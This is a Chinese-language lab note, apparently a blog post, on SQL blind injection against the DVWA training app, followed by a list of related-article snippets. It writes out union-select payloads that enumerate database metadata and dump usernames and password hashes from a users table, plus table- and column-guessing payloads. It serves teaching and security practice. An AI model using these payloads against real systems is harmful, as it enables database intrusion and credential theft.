任务092:手动漏洞挖掘-SQL盲注笔记

  1. 介绍
    web没有编写好显示过滤有数据库返回的报错信息,黑客可以通过报错信息了判断漏洞存在
    下面就是没有过滤好发现了他存在sql漏洞

    sql盲注就是看不见他报错的信息,报错的信息被过滤了,看不见我们在进行sql注入这个就叫sql盲注了
    看一下返回就结果没有显示任何东西
  2. 开始盲注
    输入一个1‘ and 1=1–
    发现被执行了说明有sql注入的

    2.2查看有多少个字段
    和1 sql注入的笔记一样的只是对了才显示内容不对就不显示任何内容
    1’ order by 5–
    看一下结果没有任何反应的说明不是5个字段

    发现测试到最多2的时候就显示了

    后面就和1,SQL注入,查看服务器系统,拿到账号密码笔记里一样了,后面就不太做演示了
    可以去我博客里去看 1,SQL注入,查看服务器系统,拿到账号密码
    后面但是有空格的
    2.联合查询 ’ union select 1,2 --
    3.查询用户’'union select user(),2 --
    4.查看版本 ' union select user() ,version() --
    5.查看当前目录' union select user() ,@@datadir --
    6.查看目标电脑用户名 ' union select user() ,@@hostname --
    7.查看系统' union select user() ,@@version_compile_os --
    8.叫所有的函数放到一个字段里' union select user() ,CONCAT_WS(CHAR(32,58,32),user(),database(),version()) --
    10.mysq查看linformation_schema内容' union select table_name,table_schema from information_schema.tables--
    11.统计一下所有的库和表的数量' UNION select table_schema,count(*) FROM information_Schema.tables group by table_schema --
    12.查看DVWA库里面的表' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'--
    13.查看users表里面的列' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users’--
    14.查看 user列和password列的内容' union select user,password from dvwa.users--
    看一下结果
  3. 猜测这个是就怎么演示了在是3 sql注入 暴力破解里面3 sql注入 暴力破解里面
    后面都是有空格的
    1.猜列名’ and asd is null–
    2.猜测表名' and 列名.要猜测的表名 is null--

sql盲注 各种方法拿到 管理员账户和密码相关推荐

  1. mysql 时间盲注语句,sql注入学习记录(5)-基于时间延迟的SQL盲注

    上次说到了sql注入中的基于报错盲注的基本的方法. 今天说一说报错盲注 基于时间延时的SQL盲注 使用时间延时注入的场景: 1.不能使用union select 联合查询方式注入 2.有些网站没有回显 ...

  2. DVWA下的SQL注入与SQL盲注

    一.SQL注入 SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作, ...

  3. Dvwa之SQL盲注全级别学习笔记

    SQL盲注 盲注是SQL注入的一种,相比于常规的SQL注入,盲注一般不会返回数据库的数据信息或者语句提示.只会返回管理员设定的特定信息. SQL盲注-测试流程 同样的,和之前DVWA的普通SQL In ...

  4. 让你轻松学会PHP版自动化SQL盲注工具-全库-全表-全字段-全字段值查询

    前言 由于一些个人原因,很久没有研究WEB安全方面的一些问题了(废话四个月前月还发了帖),正好炎炎夏日暑假的生活到来,这个时候我需要的是恶补,恶补,恶补.兜兜转转到了SQL盲注部分,然后在SQL盲注上 ...

  5. DVWA靶场-sql盲注

    第八关:SQL Injection(Blind) 盲注 SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻 ...

  6. SQL渗透与防御——(三)SQL盲注

    第三章 SQL盲注 1.Boolean-Base布尔型注入 布尔盲注 只返回布尔值的sql注入漏洞,通过构造语句,来判断数据库信息的正确性,再通过页面反回的布尔值,来判断正确与否. 布尔盲注方法 ' ...

  7. SQL盲注攻击的简单介绍

    SQL盲注攻击的简单介绍 1 简介      1.1 普通SQL注入技术概述      目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述[1]:      (1) 脚本注入式的 ...

  8. 你不知道的20万sql盲注(速来)

    1盲注基础sql实验 cet 192.168.121.1 win 192.168.121.2 首先登入cet 进入数据库 然后在mysql客户端输入以下命令 use dvwa : 得到当前数据库名称 ...

  9. SQL盲注工具BBQSQL

    SQL盲注工具BBQSQL SQL注入是将SQL命令插入到表单.域名或者页面请求的内容中.在进行注入的时候,渗透测试人员可以根据网站反馈的信息,判断注入操作的结果,以决定后续操作.如果网站不反馈具体的 ...

最新文章

  1. 使用 coding.net 发布你的个人博客
  2. 测试1111111111111111111
  3. openssl 证书管理
  4. 什么是Session共享?请举出使用场景
  5. robot 用AP连PC
  6. android联系人源码分析,android 联系人源码分析 新字段的添加流程
  7. 各种渲染软件设计理论详解
  8. 一起学《Troubleshooting Oracle Performance》吧
  9. Java面试题分享,这份资料包你值得拥有!
  10. 给定一个数组,寻找次大的数 (1)
  11. 【数据结构】四、双向链表和双向循环链表
  12. 如何编写一个好的软件设计文档——Medium中文站
  13. python模拟点击屏幕ios_python模拟点击可以在ios中实现吗?
  14. 大数据可视化分析的步骤有哪些
  15. 测试开发人员与开发人员_我是真正的开发人员还是优秀的Googler?
  16. hdu 5745 la vie en rose
  17. 从零开始搭建网站 01:IP、域名、域名解析服务器(DNS)、DNSSEC
  18. 橘子学ES19之词项搜索全文检索
  19. 【项目管理】项目进度管理
  20. Motorola和Borland结成联盟,以帮助开发者为Motorola下一代无线电话创建应用程序 (转)...

热门文章

  1. java制作霓虹灯_PS进阶教程!教你打造效果超逼真的动态闪烁霓虹灯
  2. mysql 自动备份_windows下mysql定时自动备份
  3. matlab 数字转化为文字,将数值转换为文本 - MATLAB Simulink - MathWorks 中国
  4. 华为云classroom Java练习
  5. 计算机发明时间 冯诺依曼,电脑是谁发明的,冯·诺依曼和图灵(两人都起到了重要作用)...
  6. SAP MM 无价值物料管理的一种实现思路
  7. 江南百景图过Root检测
  8. ctfshow每周挑战-极限命令执行
  9. gem 安装oxidized-web报错:checking for -licui18n... no处理
  10. IE8常见问题及解决方法